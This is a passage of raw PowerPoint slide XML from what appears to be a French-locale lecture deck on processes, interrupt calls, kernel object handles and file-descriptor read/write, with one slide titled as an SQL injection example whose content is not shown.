            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="5107781"/>
            <a:ext cx="7272338" cy="523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34F7C22-B071-A83B-5718-01D22EC45FA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088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F0B6AB-839A-A1D7-D056-F230AAA0A2A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5038725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F4B3E2-1D0A-D421-36F6-CD0B688B4373}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070057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FCA62-6D84-9773-C33E-13C2B94202F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088" y="2560677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1  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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3E9EF-2F70-BAF7-5F07-0B2CCFD09883}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986959" y="2550079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2  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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261C8-32E7-9057-A030-778B8BFA92F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8018291" y="2560677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3  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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78DDB1-E63E-EA20-A180-C3EE8B50CADE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4570188" y="2255044"/>
            <a:ext cx="14909" cy="214312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605B39-48C7-60CE-DC66-E4EA3114704E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7498220" y="2357438"/>
            <a:ext cx="14909" cy="214312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Off-page Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9B5A224-05A3-918B-DEBF-D542AB743C83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4689017" y="4845844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owchart: Off-page Connector 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12E7590F-10EC-BAF1-4004-F797EAD93737}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510834" y="4845843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owchart: Off-page Connector 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E03B236-8AFD-6E9F-29B6-B590D6CBAA1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277310" y="4845842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owchart: Off-page Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC3A6FA6-29EF-284E-1F9A-CD868822CE48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7043786" y="4845841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24DB0F82-7000-8B47-AFB7-19D51DBA49F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8047151">
            <a:off x="3742208" y="4375456"/>
            <a:ext cx="267734" cy="34630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9C4748-87A3-62D7-44C2-AADCC0FD1CB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3102769" y="6030864"/>
            <a:ext cx="417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Raise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> Process1 InteruptionCall0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ( params )</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1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42487EF7-A826-D434-3C94-1D1CEBBF65DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8006675">
            <a:off x="4024206" y="5346847"/>
            <a:ext cx="309345" cy="657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lowchart: Off-page Connector 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0808636B-A3E0-9475-34E7-6BE7920473B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3822616" y="4795024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owchart: Off-page Connector 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D7DE11D-80F3-2F2A-E91B-D619143E8D7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3292785" y="4795024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owchart: Off-page Connector 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F630AA1A-380D-02E6-B468-CE220C12BD47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2789521" y="4794210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owchart: Off-page Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52F84031-798D-42A0-FBEA-A40A2A4AB2B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3493287" y="3874293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owchart: Off-page Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E48D06E7-04BB-28FC-AFA0-91A4CE98AF5F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2963456" y="3874293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owchart: Off-page Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2AB7260-8A6F-29F6-4CD0-B3DF92F93575}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2460192" y="3873479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owchart: Off-page Connector 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED5CFBF3-02D0-D0F5-2962-9512F2BCD3D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6360527" y="3851322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owchart: Off-page Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D91E1B1-B07C-3EF8-C65B-0CAB6E9AFA65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5830696" y="3851322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owchart: Off-page Connector 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55C4DB6E-9F07-5D14-C735-DA40D9FD0AEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5327432" y="3850508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owchart: Off-page Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{591B822C-1E4C-FBB8-8D31-C37D732DA7FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="9372304" y="3855966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owchart: Off-page Connector 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E91B53F5-81C3-A218-B6EB-AD5CCBAEF460}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8842473" y="3855966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owchart: Off-page Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7934E8E1-289D-4E82-2F4F-1023D90C5CED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="8339209" y="3855152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C54A6F-4B4E-5785-B7E6-5E5474B45294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 flipV="1">
            <a:off x="3062110" y="4398168"/>
            <a:ext cx="329329" cy="3968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1601FD-E9FE-037E-2F92-697EAC4D2E97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2563941" y="4398168"/>
            <a:ext cx="329329" cy="3968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631D6FC-E2AD-EDCD-F752-7EC24DD4437F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3576187" y="4388417"/>
            <a:ext cx="329329" cy="3968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E3FABF3-7922-1483-83A3-71CEA48A7E60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-54284" y="3466327"/>
            <a:ext cx="2447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interuptCall0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(param)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> ... User code ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR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259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F2E9-3416-964D-4617-74FF18E3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SQL Injection [1/4] : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR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AEEE5-89BD-DE71-A79C-F0D5DB70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99" y="1781041"/>
            <a:ext cx="7343689" cy="409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467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3EC7E-0E67-1421-0D99-BFA8232FA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739E-7E12-87BD-CF3D-9A6D2FBEF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3" y="80963"/>
            <a:ext cx="11691937" cy="1300162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Handle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Descriptor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> "0", "1", ...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B81AAD-3658-FF43-5FB2-0C535C753C2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="4983956"/>
            <a:ext cx="7272338" cy="523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B0B587-D141-28FD-644F-2AD482AF520C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="5107781"/>
            <a:ext cx="7272338" cy="523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E6EBB01-ECEC-857A-B599-C48D923E5C86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088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BE3881-DFC4-D982-808F-85029F699DF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5038725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140F74-3158-A26A-2412-AF839516D94F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070057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D96CB-456D-A8A5-6C62-CD617B236AF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088" y="2560677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1  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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ADE75-5029-D075-79B5-39BDA2FC7F64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4986959" y="2550079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2  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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A15E97-2488-3E22-C684-7FA4E25EDA70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8018291" y="2560677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3  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>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E81435-AD5D-E4A5-62AC-50657AA33BD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4570188" y="2255044"/>
            <a:ext cx="14909" cy="214312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A09626-634F-108F-C060-07C1768796AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7498220" y="2357438"/>
            <a:ext cx="14909" cy="214312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6B0A520-E08F-E2F0-77F2-1F82E56ABF01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2581275" y="3232428"/>
            <a:ext cx="264655" cy="16192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563C007-874D-FBB3-4B12-918B65C5A659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2869807" y="3434834"/>
            <a:ext cx="264655" cy="16192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55B8D4-CDDD-E22D-71B6-CDFA91958607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3187898" y="3646766"/>
            <a:ext cx="264655" cy="16192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FC873BE-387E-2537-9FF5-2399382AE122}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2351283" y="5409124"/>
            <a:ext cx="724637" cy="2915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38A129-FA3E-DAEF-23AE-B6473B365A97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1155458" y="3141940"/>
            <a:ext cx="97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0... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>[0]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Flowchart: Off-page Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6B148F0-CB5A-84C1-82C3-8C97CECDE262}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4689017" y="4845844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owchart: Off-page Connector 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E43141C-C6C4-10FA-D03C-0437735CEFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5510834" y="4845843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owchart: Off-page Connector 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AFB5E24-FAD5-DABA-CB07-CA985F2076A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6277310" y="4845842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owchart: Off-page Connector 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0C87D0C-4E05-2318-93B4-70DBCBCCA6C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7043786" y="4845841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4E4DF5-5E47-ADAC-F2F8-1E2E4A0E60CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="22" idx="2"/>
            <a:endCxn id="3" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2713602" y="3394353"/>
            <a:ext cx="1" cy="20147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E974AE1-7CEC-B998-0AC5-BE59CC957EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2825579" y="5809172"/>
            <a:ext cx="724637" cy="2915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BE51271-8049-6ECF-86E9-100A33334859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3332531" y="6241252"/>
            <a:ext cx="724637" cy="2915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10607B7-A7C0-89EB-5E50-648337720115}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2992067" y="3579549"/>
            <a:ext cx="216180" cy="22243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AD2AE7-0676-2499-D5D4-F4AE11571BB4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3321544" y="3808691"/>
            <a:ext cx="373306" cy="24325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6AF88C-47B9-A90E-F20E-0A6A51515DF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="444074" y="5264467"/>
            <a:ext cx="20969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internal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> File </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>secured</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>struct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address</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>buffer memory, etc..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310547142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3C4E1-AC42-F57D-B831-ABD138D74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0562-32F5-FE26-6318-5D13265A9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3" y="80963"/>
            <a:ext cx="11691937" cy="1300162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Example of Communication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>between</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> Process</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> , buffer)  -  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, buffer)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942CDE-71DC-55DF-6C72-8691C114B017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="4983956"/>
            <a:ext cx="7272338" cy="523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852B7D-60A7-669A-8C83-D636EA12EABA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2409825" y="5107781"/>
            <a:ext cx="7272338" cy="523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D802753-3E2E-EC05-F881-9F75CA87EA1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088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FC844F-D677-0023-7D33-C37B7AF3A865}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5038725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6E3A7C-6D77-1D32-B23D-94FD9286A869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8070057" y="2955130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29AA1-DB88-2015-92A1-7C9AAB605F41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2224088" y="2560677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1  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>User1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-F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2F6B8-71E8-2625-24A8-90121AD15B5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
